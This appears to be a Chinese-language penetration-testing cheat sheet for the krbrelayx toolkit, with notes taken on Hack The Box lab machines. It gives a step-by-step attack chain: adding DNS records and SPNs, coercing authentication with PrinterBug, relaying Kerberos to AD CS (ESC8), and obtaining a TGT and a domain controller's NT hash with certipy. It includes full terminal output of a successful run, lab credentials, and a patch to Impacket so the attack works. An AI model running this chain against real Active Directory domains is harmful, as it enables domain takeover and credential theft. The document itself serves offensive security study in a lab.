krbrelayx
GitHub - dirkjanm/krbrelayx: Kerberos relaying and unconstrained delegation abuse toolkit
KrbRelayX 是一套利用 Kerberos 协议 进行中继(Relay)的技术方案,由安全研究员@_dirkjan 开发。它解决了传统 NTLM Relay 在面对签名强制、通道绑定或自中继防护时的局限性。
相关文章: https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
常用于 Unconstrained delegation 攻击中
git clone https://github.com/dirkjanm/krbrelayx
#添加DNS记录
dnstool.py -u 'delegate.vl\hack$' -p 'Admin123' --action add -r hack.delegate.vl -d 10.10.14.69 --type A -dns-ip 10.129.234.69
bloodyAD -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -k --host DC-01.darkcorp.htb add dnsRecord DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86 [--forest]
#加SPN (--additional 可能需要第二次)
addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'ldap/hack.delegate.vl' -t 'hack$' -dc-ip 10.129.234.69 dc1.delegate.vl
#强制认证
printerbug.py -hashes :e45a314c664d40a227f9540121d1a29d 'delegate.vl/hack$@dc1.delegate.vl' hack.delegate.vl
#开启监听
krbrelayx.py -hashes :e45a314c664d40a227f9540121d1a29d
相关命令
#看解析
nslookup hack.delegate.vl dc1.delegate.vl
#新建计算机
impacket-addcomputer 'delegate.vl/N.Thompson:KALEB_2341' -computer-name hack -computer-pass Admin123 -dc-ip 10.129.234.69
ESC8:
#添加带序列化SPN的DNS记录
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
#kerberos中继监听
krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
#触发强制认证
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
#获取tgt
certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
可能会报错:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Running in attack mode to single host [*] Running in kerberos relay mode because no credentials were specified. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up DNS Server [*] Servers started, waiting for connections [*] SMBD: Received connection from 10.129.234.48 [*] HTTP server returned status code 200, treating as a successful login [*] Generating CSR... [*] CSR generated! [*] Getting certificate... [*] SMBD: Received connection from 10.129.234.48 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' [*] SMBD: Received connection from 10.129.234.48 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' [*] GOT CERTIFICATE! ID 90 Exception in thread Thread-5: Traceback (most recent call last): File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner self.run() ~~~~~~~~^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run ADCSAttack._run(self) ~~~~~~~~~~~~~~~^^^^^^ File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run certificate_store = self.generate_pfx(key, certificate) File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx p12 = crypto.PKCS12() ^^^^^^^^^^^^^ File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__ obj = getattr(self._module, attr) AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
使用下面的命令
uv run --with "impacket>=0.11.0" --with "pyOpenSSL==24.0.0" krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
或者修改Impacket的generate_pfx:
def generate_pfx(self, key, certificate):
certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
p12 = crypto.PKCS12()
p12.set_certificate(certificate)
p12.set_privatekey(key)
return p12.export()
#=========改成下面的即可=================
def generate_pfx(self, key, certificate):
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import pkcs12
# 将证书从 PEM 转换为 cryptography 对象
cert_pem = certificate.encode() if isinstance(certificate, str) else certificate
cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)
cryptography_cert = cert_obj.to_cryptography()
# 将 OpenSSL 的私钥转换为 cryptography 对象
key_pem = crypto.dump_privatekey(crypto.FILETYPE_PEM, key)
cryptography_key = serialization.load_pem_private_key(key_pem, password=None)
# 生成 PKCS12 数据
p12_data = pkcs12.serialize_key_and_certificates(
name=b"",
key=cryptography_key,
cert=cryptography_cert,
cas=None,
encryption_algorithm=serialization.NoEncryption()
)
return p12_data
1. 案例
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86 [+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added ┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False) SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123 COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx ┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Running in attack mode to single host [*] Running in kerberos relay mode because no credentials were specified. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up DNS Server [*] Servers started, waiting for connections [*] SMBD: Received connection from 10.129.234.48 [*] HTTP server returned status code 200, treating as a successful login [*] Generating CSR... [*] CSR generated! [*] Getting certificate... [*] SMBD: Received connection from 10.129.234.48 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' [*] SMBD: Received connection from 10.129.234.48 [-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider' [*] GOT CERTIFICATE! ID 92 [*] Writing PKCS#12 certificate to ./unknown5898$.pfx [*] Certificate successfully written to file ┌──(root㉿kali)-[~/Desktop/htb/VulnCicada] └─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl' [*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000' [*] Using principal: 'dc-jpq225$@cicada.vl' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'dc-jpq225.ccache' [*] Wrote credential cache to 'dc-jpq225.ccache' [*] Trying to retrieve NT hash for 'dc-jpq225$' [*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3